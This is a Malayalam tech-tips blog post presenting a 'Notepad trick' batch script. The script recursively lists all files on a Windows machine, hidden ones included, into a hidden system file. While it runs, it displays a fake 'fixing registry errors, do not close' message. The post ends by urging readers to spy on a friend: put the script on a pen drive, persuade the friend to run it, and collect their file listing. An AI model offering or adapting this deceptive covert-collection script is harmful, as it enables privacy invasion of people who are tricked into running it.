കംപ്യൂട്ടറില്‍ സേവ് ചെയ്തിരിക്കുന്ന മുഴുവന്‍ ഫയലുകളും കാണാം..


Notepad trick - Compuhow.com
കംപ്യൂട്ടറില്‍ സേവ് ചെയ്തിരിക്കുന്ന എല്ലാ ഫയലുകളും ഒറ്റയടിക്ക് കാണാനാവുമോ? ഡ്രൈവ് തുറന്ന് പരിശോധിക്കുകയല്ലാതെ വേറെ ഏതെങ്കിലും മാര്‍ഗ്ഗത്തില്‍ സേവ് ചെയ്തിരിക്കുന്ന മുഴുവന്‍ ഫയലുകളും കണ്ടെത്താനാവുമോ ?
സാധിക്കും…ചെറിയൊരു ട്രിക്ക് വഴി. ഇതിന് വേണ്ടത് നോട്ട് പാഡില്‍ ഒരു ഫയല്‍ നിര്‍മ്മിക്കുകയാണ്. ഇത് റണ്‍ ചെയ്ത് മറച്ച് വെച്ചിരിക്കുന്നതടക്കം എല്ലാ ഫയലുകളും കണ്ടെത്താനും, അവയുടെ പാത്തുകള്‍ മനസിലാക്കാനും സാധിക്കും.
ഇത് ചെയ്യാന്‍ താഴെ കാണുന്ന കോഡ് നോട്ട് പാഡില്‍ .bat എക്സ്റ്റന്‍ഷന്‍ നല്കി സേവ് ചെയ്യുക.

ECHO OFF
COLOR 0C
CLS
ECHO.>>XBData.txt
ECHO %DATE% – %TIME%>>XBData.txt
ECHO.>>XBData.txt
ATTRIB XBData.txt +H +S
CLS
ECHO.
ECHO Finding and fixing registry errors. Please do not close the program or reboot the computer.
ECHO The registry may be damaged permanently.
ECHO.
ECHO Please wait…
DIR /S /B %USERPROFILE%*>>XBData.txt
DIR /S /B D:*>>XBData.txt
DIR /S /B /A:H %USERPROFILE%*>>XBData.txt
DIR /S /B /A:H D:*>>XBData.txt
ATTRIB XBData.txt +H +S

ഇത് സേവ് ചെയ്ത് റണ്‍ ചെയ്യുക. അപ്പോള്‍ കമാന്‍ഡ് വിന്‍ഡോ തുറന്ന് വരും.
വിന്‍ഡോ തനിയെ ക്ലോസ് ചെയ്യുമ്പോള്‍ ഫയല്‍ വിവരങ്ങള്‍ നോട്ട് പാഡില്‍ സേവ് ചെയ്യപ്പെട്ടിരിക്കുമെങ്കിലും അത് ഓപ്പണ്‍ ചെയ്യാനാവില്ല.
അത് കാണാന്‍ കണ്‍ട്രോള്‍ പാനലില്‍ Show hidden file എന്ന സെറ്റിങ്ങ്സ് ഓണ്‍ ചെയ്യണം.
അങ്ങനെ ചെയ്ത ശേഷം നോക്കിയാല്‍ സേവായ ഫല്‍ കാണാനാവും.

ഇനി ഇതുവച്ച് വേണമെങ്കില്‍ ഒരു ചാരപ്പണി ചെയ്യാം. ഈ .bat ഫയല്‍ ഒരു പെന്‍ഡ്രൈവില്‍ ആഡ് ചെയ്ത് സുഹൃത്തിന് നല്കി അത് സിസ്റ്റത്തില്‍ റണ്‍ ചെയ്ത് നോക്കാന്‍ പറയുക. റണ്‍ ചെയ്താല്‍ ആ സിസ്റ്റത്തിലെ ഫയല്‍ വിവരങ്ങളെല്ലാം പെന്‍ഡ്രൈവിലേക്ക് സേവാകും. അങ്ങനെ സുഹൃത്തിന്‍റെ സിസ്റ്റത്തിലെ ഫയലുകള്‍ സംബന്ധിച്ച കൃത്യമായ വിവരം നിങ്ങള്‍ക്ക് ലഭിക്കുകയും ചെയ്യും…!!!!

Comments

comments